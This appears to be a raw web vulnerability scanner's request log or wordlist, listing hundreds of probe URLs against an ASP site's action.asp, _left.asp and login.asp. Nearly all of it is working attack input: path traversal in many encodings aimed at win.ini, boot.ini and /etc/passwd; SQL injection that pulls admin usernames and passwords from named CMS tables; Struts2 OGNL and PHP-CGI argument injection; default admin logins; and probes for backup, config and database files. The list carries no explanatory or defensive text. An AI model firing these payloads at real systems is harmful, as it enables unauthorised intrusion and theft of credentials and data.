/common/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/scripts/uistrings.cgi
/robots.txt
/_left.asp
/action.asp?act=
/GET
/abshostimpossiblenotsec
/abshostimpossiblenotsecurity
/abshostimpossiblenotsec.aspx
/abshostimpossiblenotsecurity.aspx
/abshostimpossiblenotsec.shtml
/abshostimpossiblenotsecurity.shtml
/abshostimpossiblenotsec/
/abshostimpossiblenotsecurity/
/abshostimpossiblenotsec.zip
/abshostimpossiblenotsecurity.zip
/abshostimpossiblenotsec.php
/abshostimpossiblenotsecurity.php
/abshostimpossiblenotsec.bak
/abshostimpossiblenotsecurity.bak
/abshostimpossiblenotsec.rar
/abshostimpossiblenotsecurity.rar
/action.asp?act=88888
/login.asp.bak
/action.asp?act=88888'
/_left.asp.bak
/action.asp.bak
/login.asp.BAK
/action.asp.BAK
/_left.asp.BAK
/_vti_bin/_vti_adm/admin.dll
/action.asp?act=88888%2527
/common/absimpossiblexx/
/login.asp.zip
/Web_Scanner_Test.dll
/action.asp?act=88888%00'
/_vti_bin/_vti_aut/author.dll
/action.asp.zip
/_left.asp.zip
/_vti_bin/shtml.exe?_vti_rpc
/login.asp.ZIP
/action.asp?act=88888%5C'
/action.asp.ZIP
/_left.asp.ZIP
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/action.asp.tar.gz
/login.asp.tar.gz
/_vti_cnf/
/common/Web_Scanner_Test.dll
/_left.asp.tar.gz
/action.asp?act=88888%5C%22
/common/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/action.asp.temp
/server-info
/_left.asp.temp
/login.asp.temp
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/action.asp?act=88888JyI%3D
/action.asp.save
/login.asp.save
/_left.asp.save
/action.asp?act=88888'%22
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/server-status
/action.asp?act=88888%bf%27
/_left.asp.backup
/common/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/console/login/LoginForm.jsp
/action.asp?act=88888e888
/login.asp.backup
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/action.asp.backup
/common/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/login.asp.orig
/_left.asp.orig
/action.asp?act=888886633x3X6
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/jmx-console/
/action.asp.orig
/login.asp~
/common/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/web-console/
/_left.asp~
/action.asp?act=88888'%22%5C'%5C%22%2527%3d%bf%27%B0
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/action.asp~
/jbossws/services
/_left.asp~1
/login.asp~1
/action.asp~1
/action.asp?act=88888'[.](,.)(%22
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/login.asp.cs
/action.asp.cs
/_left.asp.cs
/common/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/action.asp?act=88888-%28-36%29-36-0-0-0%23
/action.asp.java
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/_left.asp.java
/login.asp.java
/common/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/action.asp?act=88888%27+and+sleep%280%29%23
/login.asp.class
/common/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/action.asp.class
/_left.asp.class
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/login.asp.rar
/action.asp?act=88888-%28-9996999%29-0
/action.asp.rar
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/common/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/_left.asp.rar
/action.asp?act=88888[]
/login.asp.tmp
/_left.asp.tmp
/action.asp.tmp
/common/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/action.asp?act=88888%a8%a4%00xa7%a8%a4%a1%e9
/login.asp.old
/_left.asp.old
/common/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/action.asp.old
/action.asp?act=88888'%22
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/login.bak
/action.bak
/_left.bak
/action.BAK
/.../.../.../.../.../.../.../.../windows/win.ini
/_left.BAK
/action.asp?act=88888/
/login.BAK
/action.zip
/action.asp?act=88888)
/common/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/login.zip
/_left.zip
/phpMyAdmin/show_config_errors.php
/action.ZIP
/common/.../.../.../.../.../.../.../.../windows/win.ini
/xampp/index.php
/login.ZIP
/_left.ZIP
/action.asp?act=88888!(%28%29&%26%21%7C*%7C%2A%7C
/action.tar.gz
/_left.tar.gz
/action.asp?act=../../../../../../../../boot.ini
/login.tar.gz
/action.temp
/_left.temp
/login.temp
/action.asp?act=../../../../../../../../windows/win.ini
/login.save
/action.save
/_left.save
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/action.asp?act=/../../../../../../../../windows/win.ini
/action.asp?act=..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/login.backup
/_left.backup
/action.backup
/login.orig
/action.orig
/_left.orig
/common/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/action.asp?act=../../../../../../../../winnt/win.ini
/login~
/action.asp?act=/../../../../../../../../winnt/win.ini
/_left~
/action~
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/login~1
/action~1
/action.asp?act=..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/_left~1
/etc/passwd
/common/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/action.asp?act=../../../../../../../../boot.ini%00
/_left.cs
/action.cs
/etc/passwd
/login.cs
/common/etc/passwd
/action.asp?act=../../../../../../../../windows/win.ini%00
/_left.java
/login.java
/action.java
/_left.class
/action.asp?act=../../../../../../../../winnt/win.ini%00
/common/etc/passwd
/action.class
/login.class
/action.asp?act=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/login.rar
/_left.rar
/action.rar
/_left.tmp
/action.asp?act=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
/login.tmp
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/action.tmp
/action.old
/action.asp?act=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwinnt%c0%afwin.ini
/_left.old
/login.old
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/action.asp
/common/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/action.asp?act=../../../../../../../../boot.ini%00.jpg
/_left.asp
/action.asp?redirect:%25%7B23.5*2.35%7D
/action.asp?act=../../../../../../../../windows/win.ini%00.jpg
/common/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/_left.asp?redirect:%25%7B23.5*2.35%7D
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/_left.asp
/action.asp?act=../../../../../../../../winnt/win.ini%00.jpg
/action.asp
/_left.asp
/action.asp
/action.asp?act=../../../../../../../../boot.ini%00.html
/action.asp
/common/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/action.asp?act=../../../../../../../../windows/win.ini%00.html
/_left.asp
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/action.asp?act=../../../../../../../../winnt/win.ini%00.html
/.../.../.../.../.../.../.../.../etc/passwd
/action.asp
/_left.asp
/action.asp?act=/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./boot.ini
/common/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/action.asp?id='%22%3C%3E&;
/action.asp?act=/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini
/_left.asp?id='%22%3C%3E&;
/common/.../.../.../.../.../.../.../.../etc/passwd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/action.asp?act=/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./winnt/win.ini
/action.asp?name='%22%3C%3E&;
/_left.asp?name='%22%3C%3E&;
/action.asp?act=C:%5Cboot.ini
/action.asp?m='%22%3C%3E&;
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/_left.asp?m='%22%3C%3E&;
/action.asp?act=C:%5Cwindows%5Cwin.ini
/action.asp?debug=command&expression=(#wr=#context[#parameters.obj[0]].getWriter())!=(#wr.println(#parameters.content[0]))!=(#wr.flush())!=(#wr.close())&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7f604dbaced33b7d9c2d5e1212eba16e
/_left.asp?debug=command&expression=(#wr=#context[#parameters.obj[0]].getWriter())!=(#wr.println(#parameters.content[0]))!=(#wr.flush())!=(#wr.close())&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7f604dbaced33b7d9c2d5e1212eba16e
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/action.asp?act=C:%5Cwinnt%5Cwin.ini
/common/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/action.asp?act=C:%5Cwindows%5Cwin.ini%00.jpg
/'IHLD
/common/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/action.asp?act=C:%5Cwinnt%5Cwin.ini%00.jpg
/action.asp?act=C:%5Cwindows%5Cwin.ini%00.html
/common/'IHLD
/'[.](,.)(%22HLJX
/action.asp?act=C:%5Cwinnt%5Cwin.ini%00.html
/install.php
/action.asp?act=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
/install/index.php
/common/'[.](,.)(%22HLJX
/action.asp?act=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
/common/install.php
/fckeditor/editor/dialog/fck_about.html/fckeditor/editor/dialog/fck_about.html
/action.asp?act=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwinnt%5Cwin.ini
/FCKeditor/editor/filemanager/browser/default/browser.html/fckeditor/editor/dialog/fck_about.html
/common/install/index.php
/action.asp?act=..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5Cwindows%5C%5Cwin.ini
/common/fckeditor/editor/dialog/fck_about.html/fckeditor/editor/dialog/fck_about.html
/.svn/entries
/action.asp?act=..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5Cwinnt%5C%5Cwin.ini
/xampp/showcode.php/showcode.php?showcode=1
/common/FCKeditor/editor/filemanager/browser/default/browser.html/fckeditor/editor/dialog/fck_about.html
/action.asp?act=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C../windows/win.ini
/common/.svn/entries
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/action.asp?act=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C../winnt/win.ini
/common/xampp/showcode.php/showcode.php?showcode=1
/action.asp?act=%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/common/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/action.asp?act=%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwinnt%5Cwin.ini
/action.asp?act=..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/WEB-INF/web.xml
/action.asp?act=..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/win.ini
/action.asp?act=../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
/common/WEB-INF/web.xml
/action.asp?act=../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
/action.asp?act=../..//../..//../..//../..//../..//../..//../..//../..//winnt/win.ini
/action.asp?act=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
/action.asp?act=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
/$
/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[1]+%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=webscan&content=0e06988407153d26754ad6e959de90b4
/action.asp?act=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././winnt/win.ini
/CVS/Root
/action.asp?act=..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini
/common/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[1]+%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=webscan&content=0e06988407153d26754ad6e959de90b4
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20--
/action.asp?act=..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/_database/qiye_free.asp
/action.asp?act=..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/win.ini
/common/CVS/Root
/Inc/conn.asp
/common/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20--
/action.asp?act=%3C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
/action.asp?act=%3C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
/common/_database/qiye_free.asp
/common/Inc/conn.asp
/action.asp?act=%3C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwinnt%5Cwin.ini
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/action.asp?act=%7C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
/web/?id=-1'
/action.asp?act=%7C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
/admin/index.asp
/action.asp?act=%7C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwinnt%5Cwin.ini
/common/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/common/web/?id=-1'
/action.asp?act=..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/action.asp?act=..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/win.ini
/common/admin/index.asp
/common/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/action.asp?act=..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/admin/sysadmin_view.asp
/action.asp?act=..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/win.ini
/common/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/common/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/action.asp?act=%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/action.asp?act=%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/winnt/win.ini
/common/admin/sysadmin_view.asp
/action.asp?act=../../../../../../../../boot.ini%00.htm
/myly.aspx?username=test'%20and%20@@version%3E0--
/action.asp?act=../../../../../../../../windows/win.ini%00.htm
/common/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/action.asp?act=../../../../../../../../winnt/win.ini%00.htm
/action.asp?act=../../../../../../../../boot.ini%00.txt
/common/myly.aspx?username=test'%20and%20@@version%3E0--
/action.asp?act=../../../../../../../../windows/win.ini%00.txt
/zhuti/scanner'
/common/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/solr/dev/admin/
/action.asp?act=../../../../../../../../winnt/win.ini%00.txt
/Admin/sqlPlatform/operateSql.aspx
/action.asp?act=file:///c:/boot.ini
/level/15/exec/-/show/running-config/CR
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/common/zhuti/scanner'
/action.asp?act=file:///c:/windows/win.ini
/plugins/weathermap/weathermap-cacti-plugin.php
/common/Admin/sqlPlatform/operateSql.aspx
/action.asp?act=file:///c:/winnt/win.ini
/common/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/action.asp?act=file://c:/windows/win.ini
/action.asp?act=file://c:/winnt/win.ini
/admin_aspcms/_content/_tag/aspcms_tag.asp
/icons/index
/action.asp?act=/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/icons/small/index
/action.asp?act=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/common/admin_aspcms/_content/_tag/aspcms_tag.asp
/action.asp?act=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin.ini
/resin-doc/viewfile/?file=index.jsp
/action.asp?act=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini
/action.asp?act=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/win.ini
/common/resin-doc/viewfile/?file=index.jsp
/data/%23data.asp
/action.asp?act=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/action.asp?act=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/win.ini
/common/data/%23data.asp
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/action.asp?act=..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/action.asp?act=................windowswin.ini
/common/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/action.asp?act=................windows/win.ini
/plus/Promotion.asp
/common/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/action.asp?act=................winnt/win.ini
/item/?c-5,key-1'.html
/action.asp?act=.../.../.../.../.../.../.../.../windows/win.ini
/admin/fileopen.asp?filename=../index.asp
/common/plus/Promotion.asp
/action.asp?act=.../.../.../.../.../.../.../.../winnt/win.ini
/common/item/?c-5,key-1'.html
/cache/bak_mysql.txt
/action.asp?act=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/common/admin/fileopen.asp?filename=../index.asp
/action.asp?act=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/win.ini
/common/cache/bak_mysql.txt
/action.asp?act=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/common/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/action.asp?act=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwinnt%2Fwin.ini
/action.asp?act=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/windows/win.ini
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/action.asp?act=../../../../../../../..//windows/win.ini
/action.asp?act=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
/common/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/action.asp?act=../../../../../../../..//winnt/win.ini
/DownloadShow.asp
/action.asp?act=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/action.asp?act=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini
/common/DownloadShow.asp
/action.asp?act=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/action.asp?act=%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini
/Search.asp
/action.asp?act=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
/common/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/action.asp?act=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/manage/WAP/Other/AddDalen.aspx?menu=add
/common/Search.asp
/action.asp?act=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/win.ini
/common/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/install/step4.aspx
/action.asp?act=http://some-inexistent-website.com/some_inexistent_file_with_long_name
/common/manage/WAP/Other/AddDalen.aspx?menu=add
/action.asp?act=/some_inexistent_file_with_long_name
/cacti.sql
/common/install/step4.aspx
/manage/Shop/profile/LmUserManage.aspx
/action.asp?act=dir
/zabbix.sql
/API/GetPageHtml.aspx
/action.asp?act=%3Cdir
/common/manage/Shop/profile/LmUserManage.aspx
/action.asp?act=http://oxoxoxoxoxoxox.com
/common/API/GetPageHtml.aspx
/action.asp?act=oxoxoxoxoxoxox.com
/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/config/dbconfig.ini
/action.asp?act=;print(md5(1122));%23
